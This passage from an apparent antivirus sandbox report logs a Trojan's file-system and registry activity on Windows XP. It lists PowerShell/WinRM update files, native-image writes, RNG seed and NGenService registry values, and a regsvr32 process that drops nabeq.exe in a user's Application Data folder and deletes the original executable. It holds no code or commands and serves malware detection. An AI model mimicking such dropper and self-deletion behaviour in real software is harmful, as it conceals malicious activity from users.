%System%\GroupPolicy\Adm\SET36.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (0 bytes)
%System%\wbem\SET4.tmp (0 bytes)
%System%\SET17.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (0 bytes)
%System%\SETA.tmp (0 bytes)
%System%\SET22.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (0 bytes)
%System%\SET27.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (0 bytes)
%System%\SET11.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (0 bytes)
%System%\WsmAuto.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (0 bytes)
%System%\SET8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (0 bytes)
%System%\SETF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (0 bytes)
%System%\wbem\wsmAuto.mof (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (0 bytes)
%System%\wsmplpxy.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (0 bytes)
%System%\SET26.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (0 bytes)
%System%\SET21.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (0 bytes)
%System%\SET16.tmp (0 bytes)
%System%\GroupPolicy\Adm\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (0 bytes)
%WinDir%\SECD0.tmp (0 bytes)
%System%\GroupPolicy\Adm\EventForwarding.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (0 bytes)
%System%\winrmprov.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (0 bytes)
%System%\wsmprovhost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (0 bytes)
%System%\winrmprov.mof (0 bytes)
%WinDir%\imsins.BAK (0 bytes)
%System%\SETB.tmp (0 bytes)
%System%\SET1F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (0 bytes)
%WinDir%\inf\oem10.inf (0 bytes)
%System%\SET28.tmp (0 bytes)
%System%\SET5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (0 bytes)
%System%\winrshost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (0 bytes)
%System%\SET31.tmp (0 bytes)
%WinDir%\inf\SET18.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (0 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\@.lnk (0 bytes)
%System%\WsmPty.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (0 bytes)
%System%\SET29.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (0 bytes)
%System%\WsmRes.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (0 bytes)
%WinDir%\Temp\UPD3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (0 bytes)
%System%\SET2C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (0 bytes)
%System%\SET15.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (0 bytes)
%System%\wbem\SET1E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (0 bytes)
%System%\SET2D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (0 bytes)
%System%\SET24.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (0 bytes)
%System%\winrssrv.dll (0 bytes)
%WinDir%\inf\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (0 bytes)
%System%\winrm\0409\SET1D.tmp (0 bytes)
%System%\SETD.tmp (0 bytes)
%System%\SET10.tmp (0 bytes)
%WinDir%\inf\SET19.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (0 bytes)
%System%\SET9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (0 bytes)
%System%\winrm\0409\SET37.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (0 bytes)
%System%\winrs.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (0 bytes)
%System%\SET2F.tmp (0 bytes)
%WinDir%\Help\SETC5.tmp (0 bytes)
%System%\WsmSvc.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (0 bytes)
%System%\winrsmgr.dll (0 bytes)
%System%\SET30.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (0 bytes)
%System%\SET23.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (0 bytes)
%System%\WsmTxt.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (0 bytes)
%WinDir%\inf\SET33.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (0 bytes)
The process mscorsvw.exe:2860 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD2.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD2.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index59.dat (0 bytes)
The process mscorsvw.exe:4088 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (20368 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (63539 bytes)
The process mscorsvw.exe:2296 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.PowerShell.Editor.dll (64500 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5d.dat (0 bytes)
The process mscorsvw.exe:3888 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD4.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5b.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD4.tmp (0 bytes)
The process mscorsvw.exe:3296 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD3.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD3.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5a.dat (0 bytes)
The process mscorsvw.exe:1632 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD5.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5c.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD5.tmp (0 bytes)
The process mscorsvw.exe:3044 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDB.tmp\Microsoft.WSMan.Runtime.dll (17713 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\index62.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDB.tmp (0 bytes)
The process mscorsvw.exe:2920 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDC.tmp\System.Management.Automation.dll (105990 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\index63.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDC.tmp (0 bytes)
The process mscorsvw.exe:1096 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp\Microsoft.PowerShell.GPowerShell.dll (50011 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5e.dat (0 bytes)
The process mscorsvw.exe:2420 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp\Microsoft.PowerShell.Security.dll (35530 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index60.dat (0 bytes)
The process mscorsvw.exe:1948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp\Microsoft.PowerShell.GraphicalHost.dll (47422 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5f.dat (0 bytes)
The process mscorsvw.exe:2728 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp\Microsoft.WSMan.Management.dll (34061 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index61.dat (0 bytes)
The process mscorsvw.exe:2764 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD1.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD1.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index58.dat (0 bytes)
The process PSCustomSetupUtil.exe:3592 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\BTWZ369C\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
The process PSCustomSetupUtil.exe:3496 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\H147ADGK\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
The process PSCustomSetupUtil.exe:3828 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\5QTWZ369\Microsoft.WSMan.Management.resources.dll (13 bytes)
The process PSCustomSetupUtil.exe:2096 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\DW0369CF\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)
The process PSCustomSetupUtil.exe:3732 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\GZ259CFI\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
The process PSCustomSetupUtil.exe:3652 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\9SWZ258B\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
The process PSCustomSetupUtil.exe:3692 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\GZ258BEI\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
The process PSCustomSetupUtil.exe:3856 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\9X259DGK\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
The process PSCustomSetupUtil.exe:2176 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\RADGJNQT\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)
The process PSCustomSetupUtil.exe:2288 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\0JMPSVZ2\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)
The process PSCustomSetupUtil.exe:3628 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\H0369CFI\System.Management.Automation.resources.dll (9320 bytes)
The process PSCustomSetupUtil.exe:3400 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\BUX036AD\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
The process PSCustomSetupUtil.exe:3520 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\CWZ369CF\Microsoft.WSMan.Runtime.dll (7 bytes)
The process PSCustomSetupUtil.exe:3756 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\4PSVY158\Microsoft.PowerShell.Security.resources.dll (9 bytes)
The process PSCustomSetupUtil.exe:3544 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\7QTWZ369\Microsoft.WSMan.Management.dll (9608 bytes)
The process PSCustomSetupUtil.exe:3780 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\L58BEHKO\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
The process PSCustomSetupUtil.exe:3464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\7QUX0369\Microsoft.PowerShell.Security.dll (2392 bytes)
The process PSCustomSetupUtil.exe:3332 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\P9DGJMPT\System.Management.Automation.dll (81046 bytes)
The process PSCustomSetupUtil.exe:3376 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\CVY158BE\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
The process PSCustomSetupUtil.exe:3424 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\EX147AEH\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
The process PSCustomSetupUtil.exe:2168 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\SBFILORU\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)
The process PSCustomSetupUtil.exe:2252 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\P8CFILOR\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)
The process PSCustomSetupUtil.exe:2104 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\I148BEHK\Microsoft.PowerShell.Editor.dll (32824 bytes)
The process PSSetupNativeUtils.exe:2572 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
The process regsvr32.exe:1260 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TV20EC7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\nabeq\nabeq.exe (250 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (788 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TV20EC7\uk-ua[1].htm (40545 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[2].txt (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\JP5FTNMQ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LT2VGPIN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BJN58IBF\desktop.ini (67 bytes)
The Trojan deletes the following file(s):
C:\%original file name%.exe (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TV20EC7\uk-ua[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\nabeq\nabeq.exe (0 bytes)
The process regsvr32.exe:404 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TV20EC7\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TV20EC7\WindowsXP-KB968930-x86-ENG[1].exe (0 bytes)
Registry activity
The process mofcomp.exe:3308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F8 F4 DB 70 30 00 E6 C8 4E 9F A0 DE B0 6A 62 1B"
The process WindowsXP-KB968930-x86-ENG.exe:2232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB F5 DF A2 87 E2 DA 25 62 67 9B 35 2A 3B 26 24"
The process ngen.exe:216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BF B3 15 49 C9 A6 C7 E4 92 D9 E6 CE A0 AE CA 19"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"
The process ngen.exe:2432 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 DB 39 85 4D 1B 67 3E 78 7F 1B 1F D5 B8 4B 2E"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
The process ngen.exe:1308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 00 35 B6 CB 17 7C 1B 72 EB CD 82 3B CB CD 41"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
The process ngen.exe:2440 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 84 1D 9C 83 AE 25 A9 CE DA C5 16 55 2C DA 45"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
The process ngen.exe:1904 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 C1 2D 37 A2 D9 19 B9 E7 46 75 86 E4 B7 BE 36"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"
The process ngen.exe:1712 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 F1 55 46 48 F9 45 3B 29 79 8F 6D DA 79 8C 95"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
